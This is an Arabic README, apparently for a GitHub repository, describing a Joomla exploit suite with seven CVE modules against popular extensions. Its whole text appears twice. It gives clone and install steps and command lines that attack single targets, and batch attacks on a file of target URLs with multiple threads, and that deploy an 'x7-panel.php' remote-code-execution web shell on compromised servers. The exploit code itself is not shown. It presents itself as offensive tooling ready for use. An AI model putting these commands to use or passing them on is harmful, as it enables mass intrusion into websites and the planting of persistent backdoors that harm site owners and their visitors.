مجموعة استغلال RCE متعددة الثغرات (CVE) لـ Joomla مع سبع وحدات استغلال لـ Balbooa Forms وPage Builder CK وSP Page Builder وJCE وiCagenda وHelix3 وSP LMS، بالإضافة إلى نشر الحمولة x7-panel.php.
Joomla Multi-CVE Suite — 7 وحدات ثغرات + نشر x7-panel.php
| CVE | الإضافة |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
تشغّل الحزمة سلسلة تلقائية افتراضيًا؛ استخدم --cve لوحدة واحدة.
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| الملف | الوظيفة |
|---|---|
winrarzips_brand.py | لافتة CMD (by winrarzips) |
joomla_exploits.py | وحدات استغلال الثغرات السبع |
CVE-2026-Joomla-Suite.py | واجهة سطر أوامر للدفعات + هدف واحد |
payloads/x7-panel.php | حمولة لوحة RCE |
requirements.txt | الاعتماديات |
❌ قوائم الأهداف ونتائج الفحص وعناوين URL للوحات المباشرة غير مضمّنة.
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
بالنسبة لأهداف Joomla < 5.2.2، يجب توفير مسار الخادم:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php
Joomla Multi-CVE Suite — 7 وحدات ثغرات + نشر x7-panel.php
| CVE | الإضافة |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
تشغّل الحزمة سلسلة تلقائية افتراضيًا؛ استخدم --cve لوحدة واحدة.
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| الملف | الدور |
|---|---|
winrarzips_brand.py | لافتة CMD (by winrarzips) |
joomla_exploits.py | وحدات استغلال الثغرات السبع |
CVE-2026-Joomla-Suite.py | واجهة سطر أوامر للدفعات + هدف واحد |
payloads/x7-panel.php | حمولة لوحة RCE |
requirements.txt | الاعتماديات |
❌ قوائم الأهداف ونتائج الفحص وعناوين URL للوحات المباشرة غير مضمّنة.
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
بالنسبة لأهداف Joomla < 5.2.2، يجب توفير مسار الخادم:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php